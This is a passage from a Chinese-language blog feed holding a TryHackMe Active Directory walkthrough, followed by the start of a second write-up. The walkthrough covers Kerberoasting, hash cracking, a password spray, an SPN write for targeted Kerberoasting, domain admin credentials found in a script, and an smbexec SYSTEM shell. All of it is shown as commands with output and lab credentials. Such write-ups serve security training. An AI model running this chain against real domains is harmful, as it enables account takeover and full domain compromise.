add032c5b4bcaea09739ae345c5c673e68312fa11d3405fc83ed2adcc90fe9e61176bbc0635e9db690c0880c3554cbacb69899fd0ca1f58b70697446c096c0e4c5f58f68d23ba798cf745e1127d3642031e05295599b8f6392cc51f3e59a9aaf18d1e56ef10ece0afd5398db99adc657cb8a660d0250f7930a39cace0ebd7dfdc0beb9abd0b6fc7b8f39fa10053b2b3723d045aa9f4965d7723a4bbdcb32d64b93bf46b221a507fb2f0de023b958bb4aa5dc5cae25eed7f2fcf29db01927e51a6105c821b6b18889962fd822996c2c3c8d1f8f7f70bb135dc74a3108a75737525cdc7264513e206e20f29fc430421bc904abaac8ef36357c9ce3088a37138d88243bf0ac9e3d131924cb9c23a866a2c501297f0d3d454d29f1b88a6c9efe3ce3ffca5d5200dc5a5434685d7c24f66d9b9da0e078258473ec22ec5b972b7bc186297ff175dc41cf059f91da6797dd8f7b58f2d62e3880b8fd752a6f73a7f2be2757f63dc64c569a17033180b5fb00df840b52b87be31716ee073e4f53af12b4f7f441dc0b6f6b55549e705f260d4155141cb11d60b8b3fe50daf12d5f6ace37460e57a05e43ff2ced90d95e1019491d6a583fa0fa7f952ce67f580a69edcb5343481bc57463750f4
$krb5tgs$23$*CODY_ROY$THM.LOCAL$CODY_ROY*$9f452a37f5f704a127250d1600451ad5$b395fc07d502024e93443ec761fe9ef4b6ecaac0306fcca3b5d1d45aca0228e43a0fc09be93d09fa2a113fca2572ee3500018fdc728623695167451a3fea08c7bcbebb2e01facfb5a617f9e6d9b05fa29564080be04171daa1459bd8c6b6666c7be01d331b7f0dcc46295f3b1166549efce0b443f2ea51ce21c73bfb16a50a1e6c300199bb4e8826fe8a428d7e285566ab619c9645ec2928f6f88d3800608cbc65a286a446aaea7500e4d9405f78ecf077fee09a2d205429e79b14e1b668befe194d39c14ecfd52364ec4232eb504c2f0e7f9a425441234c1c8857c90607620b8b1f82bf3b4c01266cce577ee28bf02d8d84f9b9c74f57b2b8d1f466aee7bac1210a00b1eb75d829775b652ad8c65f25ee7a8513873b878182ffbc2c095e541089cd2ea847caac168ff453c449b762dfcde2ff8d521e05311f8f6c50e19a5c3244b657e5f61e24c9c3a27a4214fece846e68e04a6ac37b526c7dee8d7bc8860523d0233a17ecd75f78703aa863d96b79def89a5f153ae5577bd2fb51fc3146aa924b1c04e0c19be00cf4e655de022d49ddee5e12c72002446a14c42ab8ae958160195f4115e318b7c76f32d01db913930ece7ed8b0ad763ea81b20645e7b34bc67da558b3809241b1b94bacf68e79868bc78c5faeea6a12794d254b85fa24e417b44fc5c55c641926fca2efb20479f06b43e8e778143c77686fdefb7837a992fbf54617282f1fcaffd3afd6058ad4ac97885dfd23a2bf5cc3f28dac0a5a3463790a3e968134d75598818a8740bf8bc0f5cb6f2e0f39341403a0ce67b78362177ce3990d94fc6735b64ca7b38785488f0fedbc323caad4160bdd423dcc5a504a3f87f4862e54209d8845f92a59cc8d2339534eb01aa713fa82f34b1987fecc709ef21be10ff878da3d4dd300cd857bdca75e4d5e192b6d04f65f24506c27d42a4f849698efa18fb82373daae8889a36715ff5b667747b5c7087ea03981fe1d811ed04bf0e99e085290178872402e27e6d5c612e88ff29188503d7125ef8f2d8d810c5032b33d7edd63d1a8ce7670c1450aaa4d87080818610cea4be91105f7b1f7e2d716c4c475aacb77c2320a5cb243188eb39fe658ac5ff34eb9d4f09bfc7deea1c56f51e47765f19eae23bf1703a19b8a02ed332bc2d3446e3193edfea7f380f854331c8a6edb90195003db0559ef7b5f6232afb10f051a58ecb2fc0367a5eaf783b08038b7573c30a16c6707cfa9c3a8aa2b4caa30c0b4bd35ff88c7265af79cd9c4d3ce12a4b21b5eebf530f84c14b8c615e95737a01781676cdecaa78e9c01bdcdb22c32e0a89fe60aa69b18e6dab51ff6a7272180ce878fe754aa044b281bc97ea65d66a7dabb93b98f3adfc20357ab2c514d5eba877979c162359971d4e15999b6ebae46a679c52d26943cc6069c84fee00b9fdec3ca36723e5cbf5178ce43a37cbfdd85762184725f62bed00a58a5d32a7426b
$krb5tgs$23$*CHRISTIAN_SANFORD$THM.LOCAL$CHRISTIAN_SANFORD*$d5f3a9b1ba5e685299831d333875b21e$6490a7d17d23d3bfb9498f85505e22400327a802d724a6c251cef8d2006a8b05c992029051940c200ab5791cac76d6b6439df1822c90b46be10689125c1770bb72ffcd2d16083814ff3cde130efbdaf16f6c428af2fee52dc5cb07093bee39b4c6bfc5b888735023715ef4d4585c120a6fc9212492b93d5002e4bc67011c75ae623f3d33e7e58c1755d0c7d9d6c7b14ea99f742faf316ad523334ea7c3abf697cfe96ee8311d3ac5640d5c93c828e0d7d909545614e9bae53f270bd67f193d9f2b8c499c76e9b3bc8b19f684ca625a9c80ba524c78bb4bdfa3fa29ce57c9ea7633be4a5ab96c749382da390cba2b7380a4bae948770ec4e37da356a8bde72c5b0b0f71e5b3747168f281aced2d319aa43ddd1d2fd66197d3c7b790bfd9f988ac78e4dc4f2eecfedec8af5872d3d40eab2575fe90a063d2d06671798ec0de8dc12176596ab2af36b97b74a47b6571d7be6a7a3ac17b5736ad0e785ca8caedf0ec1260b24cb2cb351b417b878c68f9953c9092aea8cbfddb530f169065176a505c82192a32045e87d5174f3d6d16766a8e8c6a69d4f9074bab70bc06157ed1c3e29451e2efe26b7e29fda4a7c8bdf5cd61366ade3eda62f2921f556a1cb517c2455b9235dbadecdb65dec71a78a702d756dfadecf146c822193417e44d0f092a0f674127502ef1651c2a0cb59a6e1148c0341b54da4ed39a00a225547015c30c96ba9600ef13efd096beded0aa77059f6db0c9eb91c6e47ba67ebf63076a759a46b96e54f16f0cd361a3f9ff75d2fbc8a163d07df83075286f34eae489fe28af2da7165b8cc3af21d51e290224cd306f7d8f37b1382b3b5d99003fef76b1f4f4eb949725d526fb4b5301e61403506393d206231f7a30cd91bf869ec61cac285a89d338083ae63be3884ed541014ced5d72d81a27946971fe5bd677d6b8d8d2af8d82ecd40a1f75f891e17a33bbfb8212547bacee441bfce6d537959d96e72b317f4a7947bd9c01506ef8a4939236359e640b405360129c664e9ff006784635e211a1a9f894bfa26b0541740578929d7052537d044f2174cc7ebb86d9b5e535981b5cc77ec1c846bbf0d0fff97febd7c02889b36a3af758b04c64d3db890e6870f3451b4c810bb7b5c3966a89ed4d562e35cafe8e0aca27a6fd8b0ea78975753201416e23fc7390ca14f55b41a4e032d2c17edfcb95319a2eaa3106a41c7c8a3475d6cab6d630ff1525d528151705cf685462bb194b6ef7f76f156f18caf10a980ac9b8cd6f0ba11e3df89f1da6e3be1a07cf949fdde3ce6bb13d843e6c2fb816e0b9257b260ad544f83e92036ca65261791ffbade1151071901da5b609b6353086bb572bda36e3d017f281f12c936a0d58bb6d320a62e8fc9257fd8143a5bba7b59b6d6ad76e21a964bb7572dc93d9e58f943798653ccf5480a944565822e2d242c282f13433ac623abfa6577a79c40b5a4e36bb0ab26874
</code></pre>
<p>其中只有 CODY_ROY 的哈希可以被破解: <code>MKO)mko0</code></p>
<pre><code>[CODY_ROY hash]:MKO)mko0
Approaching final keyspace - workload adjusted.           

                                                          
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: ./h1
Time.Started.....: Sat Sep 12 18:35:02 2026 (1 sec)
Time.Estimated...: Sat Sep 12 18:35:03 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/opt/seclists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#02........: 14474.1 kH/s (0.58ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/2 (50.00%) Digests (total), 1/2 (50.00%) Digests (new), 1/2 (50.00%) Salts
Progress.........: 28688768/28688768 (100.00%)
Rejected.........: 0/28688768 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#02..: Salt:1 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#02...: (Mouton -&gt; $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.SMC.: Fan0: 0%, Fan1: 0%
Hardware.Mon.#02.: Util: 79% Pwr:434mW
</code></pre>
<h1>auth as CODY_ROY</h1>
<pre><code>root@ip-10-64-113-131:~/wrk# nxc smb thm.local -u 'CODY_ROY' -p 'MKO)mko0' --shares
SMB         10.64.152.237   445    AD               [*] Windows 10 / Server 2019 Build 17763 x64 (name:AD) (domain:thm.local) (signing:True) (SMBv1:False) (Null Auth:True) (DC:True)
SMB         10.64.152.237   445    AD               [+] thm.local\CODY_ROY:MKO)mko0 
SMB         10.64.152.237   445    AD               [*] Enumerated shares
SMB         10.64.152.237   445    AD               Share           Permissions            Remark
SMB         10.64.152.237   445    AD               -----           -----------            ------
SMB         10.64.152.237   445    AD               ADMIN$                                 Remote Admin
SMB         10.64.152.237   445    AD               C$                                     Default share
SMB         10.64.152.237   445    AD               IPC$            READ                   Remote IPC
SMB         10.64.152.237   445    AD               NETLOGON        READ                   Logon server share 
SMB         10.64.152.237   445    AD               SYSVOL          READ                   Logon server share
</code></pre>
<p>凭据有效, 可以列出共享, 但没啥有趣的.</p>
<h2>pass spray</h2>
<pre><code>root@ip-10-64-113-131:~/wrk# nxc smb thm.local -u  ./users -p 'MKO)mko0' --continue-on-success &gt; ps
SMB         10.64.152.237   445    AD               [*] Windows 10 / Server 2019 Build 17763 x64 (name:AD) (domain:thm.local) (signing:True) (SMBv1:False) (Null Auth:True) (DC:True)
SMB                      10.64.152.237   445    AD               [+] thm.local\CODY_ROY:MKO)mko0 
SMB                      10.64.152.237   445    AD               [+] thm.local\ZACHARY_HUNT:MKO)mko0
</code></pre>
<p><code>ZACHARY_HUNT</code> 使用了与 <code>CODY_ROY</code> 相同的密码</p>
<h2>perm analyse</h2>
<p>我已经被 thm-attackbox 里的 bloodhound 使用体验气死了, 所以我决定返璞归真. 或许会在 beyond Adm 里记录一些别的?</p>
<h3>group map</h3>
<pre><code>root@ip-10-64-113-131:~/wrk# bloodyAD -d thm.local -u 'CODY_ROY' -p 'MKO)mko0' --dc-ip 10.64.152.237 --host thm.local  get  membership CODY_ROY
distinguishedName: CN=Remote Desktop Users,CN=Builtin,DC=thm,DC=local
objectSid: S-1-5-32-555
sAMAccountName: Remote Desktop Users

distinguishedName: CN=Remote Management Users,CN=Builtin,DC=thm,DC=local
objectSid: S-1-5-32-580
sAMAccountName: Remote Management Users

root@ip-10-64-113-131:~/wrk# bloodyAD -d thm.local -u 'CODY_ROY' -p 'MKO)mko0' --dc-ip 10.64.152.237 --host thm.local  get  membership ZACHARY_HUNT
distinguishedName: CN=Remote Desktop Users,CN=Builtin,DC=thm,DC=local
objectSid: S-1-5-32-555
sAMAccountName: Remote Desktop Users

distinguishedName: CN=Remote Management Users,CN=Builtin,DC=thm,DC=local
objectSid: S-1-5-32-580
sAMAccountName: Remote Management Users
</code></pre>
<p>除去默认属于的 Users 和 DomainUsers 组, 二者都从属 <code>Remote Management Users</code> 以及 <code>Remote Desktop Users</code>, 可以使用 winrm 以及 rdp.</p>
<h4>Domain Admins</h4>
<p>这次用 <code>powerviwe.py</code>, <code>Powerview.ps1</code> 的 python 实现:</p>
<pre><code>powerview thm.local/ZACHARY_HUNT:'MKO)mko0'@AD.thm.local
Logging directory is set to /root/.powerview/logs/thm
[2026-09-12 11:02:49] User ZACHARY_HUNT has adminCount attribute set to 1. Might be admin somewhere somehow :)
╭─LDAP─[ad.thm.local]─[THM\ZACHARY_HUNT]-[NS:&lt;auto&gt;]
╰─ ❯ Get-DomainGroupMember -Identity "Domain Admins"
GroupDomainName             : Domain Admins
GroupDistinguishedName      : CN=Domain Admins,CN=Users,DC=thm,DC=local
MemberDomain                : thm.local
MemberName                  : BEVERLY_FARRELL
MemberDistinguishedName     : CN=BEVERLY_FARRELL,OU=AZR,OU=Tier 1,DC=thm,DC=local
MemberSID                   : S-1-5-21-1966530601-3185510712-10604624-1588

GroupDomainName             : Domain Admins
GroupDistinguishedName      : CN=Domain Admins,CN=Users,DC=thm,DC=local
MemberDomain                : thm.local
MemberName                  : MARGARITO_HAMILTON
MemberDistinguishedName     : CN=MARGARITO_HAMILTON,OU=Tier 2,DC=thm,DC=local
MemberSID                   : S-1-5-21-1966530601-3185510712-10604624-1520

GroupDomainName             : Domain Admins
GroupDistinguishedName      : CN=Domain Admins,CN=Users,DC=thm,DC=local
MemberDomain                : thm.local
MemberName                  : BRADLEY_ORTIZ
MemberDistinguishedName     : CN=BRADLEY_ORTIZ,OU=FSR,OU=Tier 1,DC=thm,DC=local
MemberSID                   : S-1-5-21-1966530601-3185510712-10604624-1358

GroupDomainName             : Domain Admins
GroupDistinguishedName      : CN=Domain Admins,CN=Users,DC=thm,DC=local
MemberDomain                : thm.local
MemberName                  : SANFORD_DAUGHERTY
MemberDistinguishedName     : CN=SANFORD_DAUGHERTY,OU=Test,OU=GOO,OU=Tier 1,DC=thm,DC=local
MemberSID                   : S-1-5-21-1966530601-3185510712-10604624-1321

GroupDomainName             : Domain Admins
GroupDistinguishedName      : CN=Domain Admins,CN=Users,DC=thm,DC=local
MemberDomain                : thm.local
MemberName                  : BERNARD_CARNEY
MemberDistinguishedName     : CN=BERNARD_CARNEY,OU=AZR,OU=Tier 1,DC=thm,DC=local
MemberSID                   : S-1-5-21-1966530601-3185510712-10604624-1248

GroupDomainName             : Domain Admins
GroupDistinguishedName      : CN=Domain Admins,CN=Users,DC=thm,DC=local
MemberDomain                : thm.local
MemberName                  : Administrator
MemberDistinguishedName     : CN=Administrator,CN=Users,DC=thm,DC=local
MemberSID                   : S-1-5-21-1966530601-3185510712-10604624-500
</code></pre>
<p>除去标准的 Administrator, 还有五个 Domain Admin:</p>
<ul>
<li>BEVERLY_FARRELL</li>
<li>MARGARITO_HAMILTON</li>
<li>BRADLEY_ORTIZ</li>
<li>SANFORD_DAUGHERTY</li>
<li>BERNARD_CARNEY</li>
</ul>
<h4>RDU</h4>
<p>另外的高价值组是 <code>Remote Desktop Users</code>:</p>
<pre><code>╭─LDAP─[ad.thm.local]─[THM\ZACHARY_HUNT]-[NS:&lt;auto&gt;]
╰─ ❯ Get-DomainGroupMember -Identity "Remote Desktop Users"
GroupDomainName             : Remote Desktop Users
GroupDistinguishedName      : CN=Remote Desktop Users,CN=Builtin,DC=thm,DC=local
MemberDomain                : thm.local
MemberName                  : SUSANNA_MCKNIGHT
MemberDistinguishedName     : CN=SUSANNA_MCKNIGHT,OU=Test,OU=ITS,OU=Tier 1,DC=thm,DC=local
MemberSID                   : S-1-5-21-1966530601-3185510712-10604624-1475

GroupDomainName             : Remote Desktop Users
GroupDistinguishedName      : CN=Remote Desktop Users,CN=Builtin,DC=thm,DC=local
MemberDomain                : thm.local
MemberName                  : ZACHARY_HUNT
MemberDistinguishedName     : CN=ZACHARY_HUNT,OU=Tier 2,DC=thm,DC=local
MemberSID                   : S-1-5-21-1966530601-3185510712-10604624-1423

GroupDomainName             : Remote Desktop Users
GroupDistinguishedName      : CN=Remote Desktop Users,CN=Builtin,DC=thm,DC=local
MemberDomain                : thm.local
MemberName                  : SANFORD_DAUGHERTY
MemberDistinguishedName     : CN=SANFORD_DAUGHERTY,OU=Test,OU=GOO,OU=Tier 1,DC=thm,DC=local
MemberSID                   : S-1-5-21-1966530601-3185510712-10604624-1321

GroupDomainName             : Remote Desktop Users
GroupDistinguishedName      : CN=Remote Desktop Users,CN=Builtin,DC=thm,DC=local
MemberDomain                : thm.local
MemberName                  : CHRISTIAN_SANFORD
MemberDistinguishedName     : CN=CHRISTIAN_SANFORD,OU=Tier 1,DC=thm,DC=local
MemberSID                   : S-1-5-21-1966530601-3185510712-10604624-1229

GroupDomainName             : Remote Desktop Users
GroupDistinguishedName      : CN=Remote Desktop Users,CN=Builtin,DC=thm,DC=local
MemberDomain                : thm.local
MemberName                  : JERRI_LANCASTER
MemberDistinguishedName     : CN=JERRI_LANCASTER,OU=Tier 2,DC=thm,DC=local
MemberSID                   : S-1-5-21-1966530601-3185510712-10604624-1221

GroupDomainName             : Remote Desktop Users
GroupDistinguishedName      : CN=Remote Desktop Users,CN=Builtin,DC=thm,DC=local
MemberDomain                : thm.local
MemberName                  : CODY_ROY
MemberDistinguishedName     : CN=CODY_ROY,OU=Tier 2,DC=thm,DC=local
MemberSID                   : S-1-5-21-1966530601-3185510712-10604624-1144
</code></pre>
<p>共六个用户, 有趣的是其中 <code>SANFORD_DAUGHERTY</code> 同时属于 <code>Domain Admin</code> 组,</p>
<h3>ACLs map</h3>
<p>先看看有没有 quickwin:</p>
<pre><code>Get-DomainObjectAcl -Identity "SANFORD_DAUGHERTY" -ResolveGUIDs -Where "SecurityIdentifier contains THM\CODY_ROY"  -Where "SecurityIdentifier contains THM\ZACHARY_HUNT"
Get-DomainObjectAcl -Identity "SUSANNA_MCKNIGHT" -ResolveGUIDs -Where "SecurityIdentifier contains THM\CODY_ROY"  -Where "SecurityIdentifier contains THM\ZACHARY_HUNT"
Get-DomainObjectAcl -Identity "CHRISTIAN_SANFORD" -ResolveGUIDs -Where "SecurityIdentifier contains THM\CODY_ROY"  -Where "SecurityIdentifier contains THM\ZACHARY_HUNT"
# none
╭─LDAP─[ad.thm.local]─[THM\ZACHARY_HUNT]-[NS:&lt;auto&gt;]
╰─ ❯ Get-DomainObjectAcl -Identity "JERRI_LANCASTER" -ResolveGUIDs -Where "SecurityIdentifier contains THM\CODY_ROY"  -Where "SecurityIdentifier contains THM\ZACHARY_HUNT"
ObjectDN                    : CN=JERRI_LANCASTER,OU=Tier 2,DC=thm,DC=local
ObjectSID                   : S-1-5-21-1966530601-3185510712-10604624-1221
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : None
ActiveDirectoryRights       : ReadControl,WriteProperties,ReadProperties,Self,ListChildObjects
AccessMask                  : ReadControl,WriteProperties,ReadProperties,Self,ListChildObjects
InheritanceType             : None
SecurityIdentifier          : THM\ZACHARY_HUNT

ObjectDN                    : CN=JERRI_LANCASTER,OU=Tier 2,DC=thm,DC=local
ObjectSID                   : S-1-5-21-1966530601-3185510712-10604624-1221
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE
ActiveDirectoryRights       : ReadControl,ReadProperties,ListChildObjects
AccessMask                  : ReadControl,ReadProperties,ListChildObjects
InheritanceType             : None
SecurityIdentifier          : THM\ZACHARY_HUNT
</code></pre>
<p><code>ZACHARY_HUNT</code> 对<code>JERRI_LANCASTER</code> 有无限制的 WriteProperties, 可以理解为 GenericWrite.
GenericWrite的利用方式在 windows server 2025 前常见的共两种:</p>
<ol>
<li>ShadowcCredential -&gt; NTLM hash</li>
<li>TargetKerberoasting -&gt; targets krb5hash</li>
</ol>
<p>考虑到本机关闭了 winrm 以及 ntlm 的破解难度, 使用 TargetKerberoasting</p>
<h1>auth as ZACHARY_HUNT</h1>
<h2>TargetKerberoasting</h2>
<p>TargetKerberoasting 简而言之就是写一个 spn:</p>
<pre><code>╭─LDAP─[ad.thm.local]─[THM\ZACHARY_HUNT]-[NS:&lt;auto&gt;]
╰─ ❯ Set-DomainObject -Identity "JERRI_LANCASTER" -Set 'servicePrincipalname=HTTPS/AD.thm.local'
[2026-09-12 11:46:30] [Set-DomainObject] Success! modified attribute servicePrincipalname for CN=JERRI_LANCASTER,OU=Tier 2,DC=thm,DC=local
</code></pre>
<p>然后 kerberoasting:</p>
<pre><code>root@ip-10-64-113-131:~/wrk# GetUserSPNs.py -request-user 'JERRI_LANCASTER' thm.local/ZACHARY_HUNT:'MKO)mko0'
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName  Name             MemberOf                                            PasswordLastSet             LastLogon                   Delegation 
--------------------  ---------------  --------------------------------------------------  --------------------------  --------------------------  ----------
HTTPS/AD.thm.local    JERRI_LANCASTER  CN=Reader Admins,OU=Grouper-Groups,DC=thm,DC=local  2024-05-13 19:20:51.535220  2024-05-13 19:22:39.622629             

[-] CCache file is not found. Skipping...
$krb5tgs$23$*JERRI_LANCASTER$THM.LOCAL$thm.local/JERRI_LANCASTER*$87b96ca7b57e5fbad58f4d369c0cf5ca$dd994dc710435d771f6ea9432e49de7b0236765920083c7ac6a50b8d598c94006449499c1c0c9267d1bfdf7f8b5e133501199b0cc43bd18429a5542f1df0bf77ab3d406cb5cf98650dcd41b4188d8f94dccede8ee4b4c17938577765270a5ac5894e96d2a235c3a87dae8f6729e31933d95300d6dff1879c086cdb75e5c25bb9bddd3bfa6c4cca547b31e952fca93a0b594abe7f34d816cfb9a0e89d01c12229e4757af3d2bc00e2cc3fb93ed4af0184cccd4801a8b0761cee75e0d1b6d5b8defab90795bef8c8ea4f08792844b311c037a2d400cce08f6f377d64791c85800b8a905fdbc9dc111dfa75cad748a46ace6ace72856890805defee084f21f5b4debd3e46a3d92fa2e80b027c25d8a9598931372619ea7c4bcba3f0dd9e59bdbf274c14872625d0086d8a03f7aa7825261052f072113a09c14cb323bdb148add006c266ea97e8b362ce02a8d19c1cf15650217bb6deb8a99ee4cca31dea60ed0d5f4ad44554312f45a65dd37a75ef38837cea01d198388c7caac18c8a2378e370b523a280133a9f3ff2b7c723d2c1d556f45b3a88455792aca80c68c20e17c494426cbf791ae9524ce2425837140314a7c139551f37bf111c4e6734f044662f15b8c172ec4e4781eeadf42df86c9f5e066252f6ee3744ee6df02d5c645252a708f9631ca174c8c4f2609b81dd603a06d0cb138d79ff14858b8515a94224b757bc3d94cb2daa154f56d1de769cc81e4fd0534f675e796754f65c9cbb1c452922bdc3be5eec4cf12c82da1554dd879d0ba7897ad15edf7a34b6d890214e6007fa5fb44acd6bec66faba14b130d89cf82d3615f86e41b465d09fae00d8d4d077dbcd82847710d174a67ade5cd3c07074072b84b78873f36aaf25b26d8b0c3b44b893b9f0bf050755b5d2849ebaf19f4664019c9fd34b22efddb62bef6a67e31d3b801ea764d577627030d89e8ea5f784c959a3c1e67d5e29967382e975e576bd50e373d52999dd9950375648ed8e5cfde8a254d1f034deed601555d8378198229f1169174b62f2f0c17e41e870832ffe8440650329b250c1c8e73d196827c2c3c7c5aad7f7ac45e03b10d7e19e427fe3b081af12eee315edb07c3a8c9ab7ce737dae5c31069aab2bf683eeb23a0857cc2d55ab4437171378c509ae5d2c859bee04c43444c5886c49a2b5f47ef1d54415d81560c0f9391f540b3c52300dddcdc17614cb853b247e7321369556c026e8bbf5a880563d54034bc5613a0813549d56b4a3144d46381a8fc7aaa5fba1eccbea91454ac66de297a54e7f3410f3e5c5a5472d37e849e63fac4d996f28891f00fbb1259601e7c4cec1ec8511d591801568e99e01b83d4fd4e99ea94c25a1b8405642fcbfe0f6fc10d40cf1a5a5f4f77584e72caa9b0e9a8ac08216442f78be398ddbdff4162f2a32a8c1d59678906646f5a3c800fb1c913f7597d4df8dfbf182bc858c2c31db286ec9d5e67960aa809f0e7a57849609ed78c393e168da90451e99e9715033624b192394
</code></pre>
<p>爆破:</p>
<pre><code>$krb5tgs$23$*JERRI_LANCASTER$THM.LOCAL$thm.local/...:lovinlife!

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*JERRI_LANCASTER$THM.LOCAL$thm.local/JE...192394
Time.Started.....: Sat Sep 12 19:51:48 2026 (0 secs)
Time.Estimated...: Sat Sep 12 19:51:48 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/opt/seclists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#02........: 17415.9 kH/s (0.60ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1245184/14344384 (8.68%)
Rejected.........: 0/1245184 (0.00%)
Restore.Point....: 622592/14344384 (4.34%)
Restore.Sub.#02..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#02...: magius -&gt; swethy
Hardware.Mon.SMC.: Fan0: 0%, Fan1: 0%
Hardware.Mon.#02.: Util: 85% Pwr:207mW
</code></pre>
<h1>auth as JERRI_LANCASTER</h1>
<p>根据前面的枚举我们知道该用户是 <code>Remote Desktop Users</code></p>
<pre><code>root@ip-10-64-113-131:~/wrk# xfreerdp /v:10.64.152.237 /u:JERRI_LANCASTER /p:'lovinlife!' /dynamic-resolution /clipboard
</code></pre>
<p>好像在用户环境变量配置上出了点问题, 使用 Win+R 手动开启:
<img src="./rdp.png" alt="rdp-main" /></p>
<p>翻找文件时发现 <code>C:\Scripts</code> 目录, 在里面找到 <code>syncer.psl</code>
<img src="./script-syncer.png" alt="syncer" /></p>
<p>其功能为对 <code>AD2</code> 主机进行 DCSync, 给出了一组凭据: <code>SANFORD_DAUGHERTY</code>:<code>RESET_ASAP123</code>; 根据前文的枚举, SANFORD_DAUGHERTY 用户是 DomainAdmin</p>
<p>那 Domain 中有 <code>AD2</code> 主机吗, 没有.</p>
<pre><code>╭─LDAP─[ad.thm.local]─[THM\ZACHARY_HUNT]-[NS:&lt;auto&gt;]
╰─ ❯ Get-DomainComputer
objectClass                       : top
                                    person
                                    organizationalPerson
                                    user
                                    computer
cn                                : AD
distinguishedName                 : CN=AD,OU=Domain Controllers,DC=thm,DC=local
instanceType                      : 4
name                              : AD
objectGUID                        : {5365d9f5-a59e-40ae-9448-b3037206117c}
userAccountControl                : SERVER_TRUST_ACCOUNT
                                    TRUSTED_FOR_DELEGATION
badPwdCount                       : 3
badPasswordTime                   : 12/09/2026 10:42:10 (today)
lastLogoff                        : 1601-01-01 00:00:00+00:00
lastLogon                         : 12/09/2026 10:30:45 (today)
pwdLastSet                        : 12/09/2026 10:30:00 (today)
primaryGroupID                    : 516
objectSid                         : S-1-5-21-1966530601-3185510712-10604624-1008
logonCount                        : 1268
sAMAccountName                    : AD$
sAMAccountType                    : SAM_MACHINE_ACCOUNT
operatingSystem                   : Windows Server 2019 Datacenter
dNSHostName                       : ad.thm.local
</code></pre>
<h1>auth as SANFORD_DAUGHERTY (Adm)</h1>
<pre><code>root@ip-10-64-113-131:~/wrk# nxc smb thm.local -u 'SANFORD_DAUGHERTY' -p 'RESET_ASAP123'
SMB         10.64.152.237   445    AD               [*] Windows 10 / Server 2019 Build 17763 x64 (name:AD) (domain:thm.local) (signing:True) (SMBv1:False) (Null Auth:True) (DC:True)
SMB         10.64.152.237   445    AD               [+] thm.local\SANFORD_DAUGHERTY:RESET_ASAP123 (Pwn3d!)
root@ip-10-64-113-131:~/wrk# smbexec.py thm.local/'SANFORD_DAUGHERTY':'RESET_ASAP123'@AD.thm.local
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32&gt;whoami
nt authority\system


C:\Windows\system32&gt;ipconfig 

Windows IP Configuration

Ethernet adapter Ethernet 3:

   Connection-specific DNS Suffix  . : ec2.internal
   Link-local IPv6 Address . . . . . : fe80::e63c:ee9e:bbe7:9e6d%4
   IPv4 Address. . . . . . . . . . . : 10.64.152.237
   Subnet Mask . . . . . . . . . . . : 255.255.192.0
   Default Gateway . . . . . . . . . : 10.64.128.1


C:\Windows\system32&gt;dir C:\Users\Administrator\Desktop\
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\Users\Administrator\Desktop

05/10/2024  02:46 PM    &lt;DIR&gt;          .
05/10/2024  02:46 PM    &lt;DIR&gt;          ..
06/21/2016  03:36 PM               527 EC2 Feedback.website
06/21/2016  03:36 PM               554 EC2 Microsoft Windows Guide.website
05/10/2024  01:52 PM                59 flag.txt.txt
               3 File(s)          1,140 bytes
               2 Dir(s)  12,477,992,960 bytes free


C:\Windows\system32&gt;type C:\Users\Administrator\Desktop\flag.txt.txt
THM{INFILTRATION_WHAT_ARE_YOU_LOOKING_FOR_ASSERTS}
</code></pre>
]]></content>
    <author><name>0x5t4ckc47</name></author>
    <category term="THM-writeup"/>
  </entry>
  <entry>
    <title>FusionCorp-thm</title>
    <link href="https://0x5t4ckc47.github.io/posts/fusioncorp-thm/fusioncorp/" rel="alternate" type="text/html"/>
    <id>https://0x5t4ckc47.github.io/posts/fusioncorp-thm/fusioncorp/</id>
    <published>2026-09-09T00:00:00.000Z</published>
    <updated>2026-09-09T00:00:00.000Z</updated>
    <summary>没时间看素晴了..悲</summary>
    <content type="html"><![CDATA[<h1>recon</h1>
<pre><code>PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 128 Simple DNS Plus
80/tcp   open  http          syn-ack ttl 128 Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
|_http-title: eBusiness Bootstrap Template
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  syn-ack ttl 128 Microsoft Windows Kerberos (server time: 2026-09-09 12:48:14Z)
135/tcp  open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 128 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 128
464/tcp  open  kpasswd5?     syn-ack ttl 128
593/tcp  open  ncacn_http    syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 128
3268/tcp open  ldap          syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
